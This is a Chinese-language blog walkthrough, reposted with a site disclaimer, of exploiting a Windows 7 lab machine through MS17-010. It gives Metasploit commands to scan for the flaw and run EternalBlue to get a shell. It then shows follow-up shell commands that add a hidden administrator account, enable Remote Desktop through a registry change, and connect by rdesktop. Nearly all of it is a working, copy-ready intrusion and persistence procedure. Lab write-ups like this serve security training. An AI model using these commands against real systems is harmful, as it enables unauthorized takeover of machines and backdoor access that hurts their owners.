标签:Getshell xxxx Windows Win7 010 ms17 msf 靶机
------------恢复内容开始------------
① 登录kali 提升root权限
sudo su //提权root kali //输入密码 cd ~ //切换根目录
② 登录Kali Linux,进入MSF框架,搜索ms17-010代码
msfconsole msf > search ms17_010
③ 使用ms17-010扫描模块,对靶机Win7进行扫描
msf > use 1 //使用auxiliary/scanner/smb/smb_ms17_010扫描模块 msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.127.131 //设置目标IP或网段 msf auxiliary(smb_ms17_010) > run //执行扫描
从截图可以看到,扫描模块发现Win7存在漏洞风险
④ 使用ms17-010渗透模块,对靶机Win7进行渗透
msf > use 2 //使用exploit/windows/smb/ms17_010_eternalblue渗透模块 msf exploit(ms17_010_eternalblue) > show options //查看可设置的选项 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.127.131 //设置渗透目标ip msf exploit(ms17_010_eternalblue) > exploit //执行渗透
从最终效果来看,此时Kali Linux通过MS17-010渗透代码,直接拿到Win7的Shell,之后便可以通过Shell对目标靶机WIN7进行控制。
⑤ 通过Shell对靶机Win7进行控制
net user xxxx xxxx /add //创建用户名密码xxxx/xxxx net localgroup administrators xxxx /add //将用户xxxx添加入管理组 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启远程桌面功能 rdesktop 192.168.127.131:3389 //Kali远程桌面连接Win7
可以看到,最终Kali通过shell新建了用户,并通过远程桌面连接到目标靶机上.
标签:Getshell,xxxx,Windows,Win7,010,ms17,msf,靶机 来源: https://www.cnblogs.com/U-M-R/p/15488245.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。